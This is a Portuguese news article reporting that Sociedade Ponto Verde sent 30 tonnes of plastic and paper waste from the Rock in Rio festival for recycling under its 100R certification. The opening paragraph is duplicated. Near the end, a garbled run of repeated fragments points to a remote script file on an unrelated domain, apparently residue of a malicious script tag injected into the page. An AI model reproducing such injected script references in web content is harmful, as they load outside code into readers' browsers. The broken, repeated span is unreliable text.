Sociedade Ponto Verde garante reciclagem no Rock in Rio

A Sociedade Ponto Verde (SPV) assegurou o encaminhamento para reciclagem das 30 toneladas de resíduos de embalagens que foram gerados no recinto do Rock in Rio, através do ?100R®?.

A Sociedade Ponto Verde (SPV) assegurou o encaminhamento para reciclagem das 30 toneladas de resíduos de embalagens que foram gerados no recinto do Rock in Rio, através do ?100R®?.

 

«Como resultado das diversas acções desenvolvidas pela SPV no decurso desta edição do Rock in Rio foram separadas e encaminhadas, posteriormente, para reciclagem 27 toneladas de plástico e 3 toneladas de papel», informou Luís Veiga Martins, director-geral da SPV.

 

Para a divulgação destas acções e sensibilização dos presentes, a SPV disponibilizou no recinto um espaço lúdico, onde apelava à participação dos visitantes, que ao colocarem embalagens num Copão com quase 3 metros, recebiam um brinde em troca.

 

O jogo interactivo Ubitris estava também disponível para ensinar a todos quais as embalagens que devem ser colocadas nos ecopontos. De acordo com os dados divulgados em comunicado pela empresa, foram colocadas no Copão, por mais de 2.500 participantes, 10.882 embalagens, nomeadamente copos de plástico, de papel e garrafas de plástico.

 

«O balanço final do mais recente desafio lançado pela SPV ? 100R® – é muito positivo. Acreditamos que o 100R® é um sucesso e que em muito contribuirá para termos eventos e espaços cada vez mais sustentáveis e com mais e melhores hábitos de reciclagem», acrescentou Veiga Martins.

 

«Queremos que a marca e a certificação 100R® se tornem reconhecidas como uma mais-valia para os eventos onde esteja presente. Com a população cada vez mais preocupada e atenta às questões ambientais, os eventos que reflictam essa preocupação terão um mérito e reconhecimento muito elevados», conclui.

ttp://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hd

Não perca informação: Subscreva as nossas Newsletters

Subscrever